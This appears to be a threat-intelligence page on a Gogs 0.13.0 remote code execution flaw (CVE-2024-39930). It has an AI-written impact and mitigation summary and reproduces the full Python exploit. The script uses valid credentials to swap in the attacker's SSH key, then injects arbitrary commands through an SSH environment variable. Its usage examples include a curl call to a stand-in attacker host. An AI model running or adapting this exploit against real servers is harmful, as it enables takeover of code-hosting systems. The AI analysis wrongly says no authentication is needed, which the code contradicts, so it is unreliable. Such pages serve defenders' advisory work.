gogs 0.13.0 - Remote Code Execution (RCE)
gogs 0.13.0 - Remote Code Execution (RCE)
AI Analysis
Technical Summary
The security threat concerns a Remote Code Execution (RCE) vulnerability in Gogs version 0.13.0, a self-hosted Git service written in Go. RCE vulnerabilities allow attackers to execute arbitrary code on the affected server, potentially gaining full control over the system. Although specific technical details are not provided, the presence of exploit code written in Python indicates that the vulnerability can be reliably exploited remotely without authentication or with minimal user interaction. Given Gogs' role as a Git repository management platform, exploitation could lead to unauthorized access to source code, manipulation of repositories, and compromise of the underlying server infrastructure. The lack of patch links suggests that no official fix was available at the time of reporting, increasing the risk for unpatched installations. The exploit being listed in Exploit-DB with a dedicated ID (52348) and tagged as critical further emphasizes the severity and practical exploitability of this vulnerability.
Potential Impact
For European organizations, especially those relying on Gogs for internal or external source code management, this RCE vulnerability poses a significant risk. Successful exploitation could lead to theft or tampering of intellectual property, disruption of development workflows, and potential lateral movement within corporate networks. Given the critical nature of software supply chain security in Europe, such a compromise could have cascading effects on software integrity and compliance with regulations like GDPR if personal data is involved. Additionally, compromised Gogs servers could be used as a foothold for launching further attacks or deploying ransomware, amplifying operational and reputational damage.
Mitigation Recommendations
Organizations should immediately audit their infrastructure to identify any instances of Gogs version 0.13.0. Given the absence of official patches, mitigation should include isolating affected servers from critical network segments and restricting external access. Employing web application firewalls (WAFs) with custom rules to detect and block exploit attempts targeting known RCE vectors in Gogs is recommended. Monitoring logs for unusual activity related to repository access or server commands can provide early detection. Where possible, upgrading to a later, patched version of Gogs or migrating to alternative Git hosting solutions with active security support is advised. Implementing strict network segmentation and applying the principle of least privilege to service accounts running Gogs will limit the impact of any successful exploitation.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Poland
Indicators of Compromise
- exploit-code: # Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE) # Date: 27th June, 2025 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/gogs/gogs.git # Version: gogs <=0.13.0 # Tested on: Ubuntu # CVE: CVE-2024-39930 # =============================== # Example Usage: # python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned" # python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222 # =============================== import requests import paramiko import base64 import random import string import sys import argparse from urllib.parse import urlparse API_BASE_URL = "" def generate_random_string(length=8, charset=None): if charset is None: charset = string.ascii_letters + string.digits return ''.join(random.choices(charset, k=length)) def make_headers(token=None, basic_auth=None): headers = {"Content-Type": "application/json"} if token: headers["Authorization"] = f"token {token}" elif basic_auth: b64 = base64.b64encode(basic_auth.encode()).decode() headers["Authorization"] = f"Basic {b64}" return headers def http_post(path, json=None, headers=None): url = f"{API_BASE_URL}{path}" response = requests.post(url, json=json, headers=headers) response.raise_for_status() return response def http_get(path, headers=None): url = f"{API_BASE_URL}{path}" response = requests.get(url, headers=headers) response.raise_for_status() return response def http_delete(path, headers=None): url = f"{API_BASE_URL}{path}" response = requests.delete(url, headers=headers) response.raise_for_status() return response def obtain_api_token(username, password): auth = f"{username}:{password}" headers = make_headers(basic_auth=auth) data = {"name": generate_random_string()} try: response = http_post(f"/users/{username}/tokens", json=data, headers=headers) token = response.json()['sha1'] print(f"[+] API Token Acquired: {token}") return token except Exception as e: print(f"[!] Failed to obtain API token: {e}") sys.exit(1) def create_repo(token): repo_name = generate_random_string() headers = make_headers(token=token) data = { "name": repo_name, "description": "Auto-created repository", "private": False } try: response = http_post("/user/repos", json=data, headers=headers) full_name = response.json()['full_name'] print(f"[+] Repository Created: {full_name}") return full_name except Exception as e: print(f"[!] Failed to create repository: {e}") sys.exit(1) def delete_existing_ssh_keys(token): headers = make_headers(token=token) try: response = http_get("/user/keys", headers=headers) keys = response.json() for key in keys: key_id = key['id'] http_delete(f"/user/keys/{key_id}", headers=headers) print(f"[+] Deleted SSH Key ID: {key_id}") except Exception as e: print(f"[!] Failed to delete existing SSH keys: {e}") sys.exit(1) def add_ssh_key(public_key_path, token): delete_existing_ssh_keys(token) try: with open(public_key_path, 'r') as f: key = f.read() except Exception as e: print(f"[!] Failed to read public key file: {e}") sys.exit(1) headers = make_headers(token=token) data = { "title": generate_random_string(), "key": key } try: response = http_post("/user/keys", json=data, headers=headers) print(f"[+] SSH Key Added: {response.status_code}") except Exception as e: print(f"[!] Failed to add SSH key: {e}") sys.exit(1) def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command): try: key = paramiko.RSAKey.from_private_key_file(private_key_path) except Exception as e: print(f"[!] Failed to load SSH key: {e}") sys.exit(1) try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key) session = client.get_transport().open_session() print("[+] Executing command...... ") session.set_environment_variable("--split-string", command) session.exec_command(f"git-upload-pack {repo_path}") stdout = session.makefile('rb', 1024) stderr = session.makefile_stderr('rb', 1024) print("STDERR:", stderr.read().decode()) print("STDOUT:", stdout.read().decode()) session.close() client.close() except Exception as e: print(f"[!] Error: {e}") sys.exit(1) def main(): global API_BASE_URL parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)") parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)") parser.add_argument("auth", help="Gogs credentials in the format username:password") parser.add_argument("private_key", help="Path to private SSH key") parser.add_argument("public_key", help="Path to public SSH key") parser.add_argument("command", help="Command to execute remotely") parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use") args = parser.parse_args() parsed_url = urlparse(args.url) API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1" ssh_host = parsed_url.hostname ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22) try: username, password = args.auth.split(":") except ValueError: print("[!] Invalid format for auth argument") sys.exit(1) token = obtain_api_token(username, password) repo_path = create_repo(token) add_ssh_key(args.public_key, token) exploit( ssh_user=username, ssh_host=ssh_host, ssh_port=ssh_port, private_key_path=args.private_key, repo_path=repo_path, command=args.command ) if __name__ == "__main__": main()
gogs 0.13.0 - Remote Code Execution (RCE)
Description
gogs 0.13.0 - Remote Code Execution (RCE)
AI-Powered Analysis
Technical Analysis
The security threat concerns a Remote Code Execution (RCE) vulnerability in Gogs version 0.13.0, a self-hosted Git service written in Go. RCE vulnerabilities allow attackers to execute arbitrary code on the affected server, potentially gaining full control over the system. Although specific technical details are not provided, the presence of exploit code written in Python indicates that the vulnerability can be reliably exploited remotely without authentication or with minimal user interaction. Given Gogs' role as a Git repository management platform, exploitation could lead to unauthorized access to source code, manipulation of repositories, and compromise of the underlying server infrastructure. The lack of patch links suggests that no official fix was available at the time of reporting, increasing the risk for unpatched installations. The exploit being listed in Exploit-DB with a dedicated ID (52348) and tagged as critical further emphasizes the severity and practical exploitability of this vulnerability.
Potential Impact
For European organizations, especially those relying on Gogs for internal or external source code management, this RCE vulnerability poses a significant risk. Successful exploitation could lead to theft or tampering of intellectual property, disruption of development workflows, and potential lateral movement within corporate networks. Given the critical nature of software supply chain security in Europe, such a compromise could have cascading effects on software integrity and compliance with regulations like GDPR if personal data is involved. Additionally, compromised Gogs servers could be used as a foothold for launching further attacks or deploying ransomware, amplifying operational and reputational damage.
Mitigation Recommendations
Organizations should immediately audit their infrastructure to identify any instances of Gogs version 0.13.0. Given the absence of official patches, mitigation should include isolating affected servers from critical network segments and restricting external access. Employing web application firewalls (WAFs) with custom rules to detect and block exploit attempts targeting known RCE vectors in Gogs is recommended. Monitoring logs for unusual activity related to repository access or server commands can provide early detection. Where possible, upgrading to a later, patched version of Gogs or migrating to alternative Git hosting solutions with active security support is advised. Implementing strict network segmentation and applying the principle of least privilege to service accounts running Gogs will limit the impact of any successful exploitation.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52348
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for gogs 0.13.0 - Remote Code Execution (RCE)
# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE) # Date: 27th June, 2025 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/gogs/gogs.git # Version: gogs <=0.13.0 # Tested on: Ubuntu # CVE: CVE-2024-39930 # =============================== # Example Usage: # python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned" # python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa... (5822 more characters)
Threat ID: 68653a7e6f40f0eb7292de01
Added to database: 7/2/2025, 1:56:14 PM
Last enriched: 7/16/2025, 9:22:53 PM
Last updated: 7/30/2025, 5:04:33 AM
Views: 34
Related Threats
Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits
CriticalApple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome
CriticalHow we use MongoDB to detect and block malicious IPs in real time
LowCritical SAP flaw exploited to launch Auto-Color Malware attack on U.S. company
CriticalExploiting zero days in abandoned hardware
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.